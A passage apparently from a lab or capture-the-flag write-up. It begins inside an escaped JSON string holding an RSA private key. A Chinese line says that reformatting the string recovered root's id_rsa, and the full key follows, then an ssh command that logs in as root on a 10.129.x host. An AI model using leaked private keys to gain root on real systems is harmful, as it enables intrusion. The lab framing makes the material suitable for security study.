6T83Y9nup4mkln0OzT\nrti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB\nN1ZI4E59+O3Z15VgZ\/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD\nSsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o\n++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp\nUnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR\/xkIP\/Mog1a\nvmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU\n6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC\/cQbPm\nQeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G\n-----END RSA PRIVATE KEY-----\n"}
通过换行改变\n并删除\,我们保留了根id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9/jG5NPqc2TfW4Nlj9gE
KScDJTrF0vXYnIy4yUwM4/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq
IMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH/
KuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL/XP1hN4B7egzjcV8Rphj6XRE3bhgH
7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8
W6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae
NPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9
t3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8/v/3Jeesznu+RJ+G0ezyUGfi0wpQRoD
C2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl
hnqFXpOWB771WnW9yH7/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x/LUyan++D+8
efiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2
1bLlZQECgYEA9iT13rdKQ/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj
nVhtw6NRFZ1Gfu21kPTCUTK34iX/p/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3
sqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou
fEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q
0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ
zkbVWX3JRDh4vdFOBGB/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT
rti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB
N1ZI4E59+O3Z15VgZ/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD
SsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o
++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp
UnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR/xkIP/Mog1a
vmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU
6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC/cQbPm
QeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G
-----END RSA PRIVATE KEY-----
ssh root@10.129.179.184 -i id_rsa
